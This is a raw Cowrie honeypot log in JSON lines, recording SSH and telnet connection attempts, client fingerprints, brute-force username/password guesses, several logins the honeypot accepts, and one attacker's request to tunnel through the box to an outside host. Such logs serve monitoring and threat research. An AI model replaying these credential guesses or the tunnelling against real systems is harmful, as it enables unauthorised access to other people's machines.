{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":57379,"dst_ip":"1.2.3.4","dst_port":22,"session":"04f9f02bf37a","protocol":"ssh","message":"New connection: 80.94.95.15:57379 (1.2.3.4:22) [session: 04f9f02bf37a]","sensor":"my-vps","timestamp":"2025-08-28T15:24:38.403889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:24:38.404973Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:24:38.508724Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.login.failed","username":"user","password":"fuckers","message":"login attempt [user/fuckers] failed","sensor":"my-vps","timestamp":"2025-08-28T15:24:39.023557Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.login.failed","username":"user","password":"fletcher","message":"login attempt [user/fletcher] failed","sensor":"my-vps","timestamp":"2025-08-28T15:24:40.135943Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.login.failed","username":"user","password":"content","message":"login attempt [user/content] failed","sensor":"my-vps","timestamp":"2025-08-28T15:24:41.212714Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.login.failed","username":"user","password":"account","message":"login attempt [user/account] failed","sensor":"my-vps","timestamp":"2025-08-28T15:24:42.316042Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.login.failed","username":"user","password":"906090","message":"login attempt [user/906090] failed","sensor":"my-vps","timestamp":"2025-08-28T15:24:43.434407Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:24:44.540715Z","src_ip":"80.94.95.15","session":"04f9f02bf37a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49237,"dst_ip":"1.2.3.4","dst_port":23,"session":"d8f75da12098","protocol":"telnet","message":"New connection: 212.227.235.229:49237 (1.2.3.4:23) [session: d8f75da12098]","sensor":"my-vps","timestamp":"2025-08-28T15:25:04.580087Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49606,"dst_ip":"1.2.3.4","dst_port":22,"session":"ba648dfa74fd","protocol":"ssh","message":"New connection: 212.227.235.229:49606 (1.2.3.4:22) [session: ba648dfa74fd]","sensor":"my-vps","timestamp":"2025-08-28T15:25:16.580034Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:25:16.580969Z","src_ip":"212.227.235.229","session":"ba648dfa74fd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:25:16.762865Z","src_ip":"212.227.235.229","session":"ba648dfa74fd"}
{"eventid":"cowrie.login.failed","username":"larry","password":"123","message":"login attempt [larry/123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:25:17.535568Z","src_ip":"212.227.235.229","session":"ba648dfa74fd"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:25:18.721215Z","src_ip":"212.227.235.229","session":"ba648dfa74fd"}
{"eventid":"cowrie.session.closed","duration":31.09264612197876,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:25:35.672666Z","src_ip":"212.227.235.229","session":"d8f75da12098"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":59859,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b099b724f80","protocol":"ssh","message":"New connection: 186.225.142.90:59859 (1.2.3.4:22) [session: 5b099b724f80]","sensor":"my-vps","timestamp":"2025-08-28T15:26:04.321172Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:26:04.322180Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T15:26:04.512680Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.login.success","username":"root","password":"100988!","message":"login attempt [root/100988!] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:26:05.133652Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:26:05.546587Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T15:26:05.547299Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:26:05.743379Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:26:05.752923Z","src_ip":"186.225.142.90","session":"5b099b724f80"}
{"eventid":"cowrie.session.connect","src_ip":"45.78.193.100","src_port":43716,"dst_ip":"1.2.3.4","dst_port":22,"session":"e10427693b7c","protocol":"ssh","message":"New connection: 45.78.193.100:43716 (1.2.3.4:22) [session: e10427693b7c]","sensor":"my-vps","timestamp":"2025-08-28T15:26:20.116679Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:26:20.118002Z","src_ip":"45.78.193.100","session":"e10427693b7c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54260,"dst_ip":"1.2.3.4","dst_port":22,"session":"0a13f0128d56","protocol":"ssh","message":"New connection: 217.72.205.35:54260 (1.2.3.4:22) [session: 0a13f0128d56]","sensor":"my-vps","timestamp":"2025-08-28T15:26:43.199106Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:26:43.200257Z","src_ip":"217.72.205.35","session":"0a13f0128d56"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T15:26:58.199375Z","src_ip":"45.78.193.100","session":"e10427693b7c"}
{"eventid":"cowrie.login.success","username":"root","password":" ","message":"login attempt [root/ ] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:26:59.338925Z","src_ip":"45.78.193.100","session":"e10427693b7c"}
{"eventid":"cowrie.session.closed","duration":"39.4","message":"Connection lost after 39.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:26:59.530464Z","src_ip":"45.78.193.100","session":"e10427693b7c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":35950,"dst_ip":"1.2.3.4","dst_port":23,"session":"de88fd7b19b5","protocol":"telnet","message":"New connection: 212.227.235.229:35950 (1.2.3.4:23) [session: de88fd7b19b5]","sensor":"my-vps","timestamp":"2025-08-28T15:29:09.585542Z"}
{"eventid":"cowrie.session.closed","duration":30.544836282730103,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:29:40.130305Z","src_ip":"212.227.235.229","session":"de88fd7b19b5"}
{"eventid":"cowrie.session.connect","src_ip":"79.124.8.120","src_port":41214,"dst_ip":"1.2.3.4","dst_port":23,"session":"cc0aeca4171a","protocol":"telnet","message":"New connection: 79.124.8.120:41214 (1.2.3.4:23) [session: cc0aeca4171a]","sensor":"my-vps","timestamp":"2025-08-28T15:30:47.384616Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:30:47.424288Z","src_ip":"79.124.8.120","session":"cc0aeca4171a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:30:47.440746Z","src_ip":"79.124.8.120","session":"cc0aeca4171a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44534,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b6e74a20819","protocol":"ssh","message":"New connection: 212.227.235.229:44534 (1.2.3.4:22) [session: 9b6e74a20819]","sensor":"my-vps","timestamp":"2025-08-28T15:31:10.134963Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:31:10.136388Z","src_ip":"212.227.235.229","session":"9b6e74a20819"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44874,"dst_ip":"1.2.3.4","dst_port":22,"session":"822101632784","protocol":"ssh","message":"New connection: 212.227.235.229:44874 (1.2.3.4:22) [session: 822101632784]","sensor":"my-vps","timestamp":"2025-08-28T15:31:10.297048Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T15:31:10.297792Z","src_ip":"212.227.235.229","session":"822101632784"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T15:31:10.459195Z","src_ip":"212.227.235.229","session":"822101632784"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:31:10.944428Z","src_ip":"212.227.235.229","session":"822101632784"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T15:31:11.107245Z","session":"822101632784"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53724,"dst_ip":"1.2.3.4","dst_port":23,"session":"73ba49b498c4","protocol":"telnet","message":"New connection: 212.227.235.229:53724 (1.2.3.4:23) [session: 73ba49b498c4]","sensor":"my-vps","timestamp":"2025-08-28T15:31:18.907605Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:31:19.104230Z","src_ip":"212.227.235.229","session":"73ba49b498c4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:31:19.119199Z","src_ip":"212.227.235.229","session":"73ba49b498c4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":3654,"dst_ip":"1.2.3.4","dst_port":22,"session":"cabd927156ca","protocol":"ssh","message":"New connection: 212.227.125.160:3654 (1.2.3.4:22) [session: cabd927156ca]","sensor":"my-vps","timestamp":"2025-08-28T15:32:14.020898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T15:32:19.397815Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T15:32:19.477863Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"ubuntu@1234","message":"login attempt [ubuntu/ubuntu@1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:32:19.885977Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:32:20.297746Z","src_ip":"212.227.235.229","session":"822101632784"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc123","message":"login attempt [ubuntu/abc123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:32:20.969055Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abcd123","message":"login attempt [ubuntu/abcd123] failed","sensor":"my-vps","timestamp":"2025-08-28T15:32:22.964317Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abcd1234","message":"login attempt [ubuntu/abcd1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:32:24.047149Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"abc1234","message":"login attempt [ubuntu/abc1234] failed","sensor":"my-vps","timestamp":"2025-08-28T15:32:25.130483Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.session.closed","duration":"12.2","message":"Connection lost after 12.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:32:26.213970Z","src_ip":"212.227.125.160","session":"cabd927156ca"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.217","src_port":33552,"dst_ip":"1.2.3.4","dst_port":23,"session":"3bd57f2b8aac","protocol":"telnet","message":"New connection: 162.142.125.217:33552 (1.2.3.4:23) [session: 3bd57f2b8aac]","sensor":"my-vps","timestamp":"2025-08-28T15:32:34.612886Z"}
{"eventid":"cowrie.session.closed","duration":15.568506002426147,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:32:50.181293Z","src_ip":"162.142.125.217","session":"3bd57f2b8aac"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.217","src_port":51288,"dst_ip":"1.2.3.4","dst_port":23,"session":"13572452bcde","protocol":"telnet","message":"New connection: 162.142.125.217:51288 (1.2.3.4:23) [session: 13572452bcde]","sensor":"my-vps","timestamp":"2025-08-28T15:32:54.422376Z"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.114","src_port":36746,"dst_ip":"1.2.3.4","dst_port":23,"session":"512e679e6e18","protocol":"telnet","message":"New connection: 167.94.138.114:36746 (1.2.3.4:23) [session: 512e679e6e18]","sensor":"my-vps","timestamp":"2025-08-28T15:32:56.703093Z"}
{"eventid":"cowrie.session.closed","duration":3.30251407623291,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:32:57.724801Z","src_ip":"162.142.125.217","session":"13572452bcde"}
{"eventid":"cowrie.session.connect","src_ip":"162.142.125.217","src_port":42302,"dst_ip":"1.2.3.4","dst_port":23,"session":"58feec7ee6ec","protocol":"telnet","message":"New connection: 162.142.125.217:42302 (1.2.3.4:23) [session: 58feec7ee6ec]","sensor":"my-vps","timestamp":"2025-08-28T15:33:01.279779Z"}
{"eventid":"cowrie.session.closed","duration":10.172039270401001,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:11.451739Z","src_ip":"162.142.125.217","session":"58feec7ee6ec"}
{"eventid":"cowrie.session.closed","duration":19.090014457702637,"message":"Connection lost after 19 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:15.793003Z","src_ip":"167.94.138.114","session":"512e679e6e18"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65310,"dst_ip":"1.2.3.4","dst_port":22,"session":"82d5d3118a2d","protocol":"ssh","message":"New connection: 217.72.205.35:65310 (1.2.3.4:22) [session: 82d5d3118a2d]","sensor":"my-vps","timestamp":"2025-08-28T15:33:20.323726Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:20.324860Z","src_ip":"217.72.205.35","session":"82d5d3118a2d"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.114","src_port":33724,"dst_ip":"1.2.3.4","dst_port":23,"session":"dc5c09ad6f07","protocol":"telnet","message":"New connection: 167.94.138.114:33724 (1.2.3.4:23) [session: dc5c09ad6f07]","sensor":"my-vps","timestamp":"2025-08-28T15:33:20.995144Z"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.115","src_port":49846,"dst_ip":"1.2.3.4","dst_port":23,"session":"5d1b82bfb837","protocol":"telnet","message":"New connection: 206.168.34.115:49846 (1.2.3.4:23) [session: 5d1b82bfb837]","sensor":"my-vps","timestamp":"2025-08-28T15:33:23.780493Z"}
{"eventid":"cowrie.session.closed","duration":3.909032106399536,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:24.904093Z","src_ip":"167.94.138.114","session":"dc5c09ad6f07"}
{"eventid":"cowrie.session.connect","src_ip":"167.94.138.114","src_port":58902,"dst_ip":"1.2.3.4","dst_port":23,"session":"dfc40246881a","protocol":"telnet","message":"New connection: 167.94.138.114:58902 (1.2.3.4:23) [session: dfc40246881a]","sensor":"my-vps","timestamp":"2025-08-28T15:33:29.147243Z"}
{"eventid":"cowrie.session.closed","duration":15.763703346252441,"message":"Connection lost after 15 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:39.544129Z","src_ip":"206.168.34.115","session":"5d1b82bfb837"}
{"eventid":"cowrie.session.closed","duration":10.818952798843384,"message":"Connection lost after 10 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:39.966130Z","src_ip":"167.94.138.114","session":"dfc40246881a"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.115","src_port":48966,"dst_ip":"1.2.3.4","dst_port":23,"session":"a6ae9ae41cb0","protocol":"telnet","message":"New connection: 206.168.34.115:48966 (1.2.3.4:23) [session: a6ae9ae41cb0]","sensor":"my-vps","timestamp":"2025-08-28T15:33:43.339366Z"}
{"eventid":"cowrie.session.closed","duration":3.7248694896698,"message":"Connection lost after 3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:47.064158Z","src_ip":"206.168.34.115","session":"a6ae9ae41cb0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:47.442279Z","src_ip":"79.124.8.120","session":"cc0aeca4171a"}
{"eventid":"cowrie.session.closed","duration":180.06065034866333,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:33:47.445190Z","src_ip":"79.124.8.120","session":"cc0aeca4171a"}
{"eventid":"cowrie.session.connect","src_ip":"206.168.34.115","src_port":56964,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a218ecaab62","protocol":"telnet","message":"New connection: 206.168.34.115:56964 (1.2.3.4:23) [session: 7a218ecaab62]","sensor":"my-vps","timestamp":"2025-08-28T15:33:53.575747Z"}
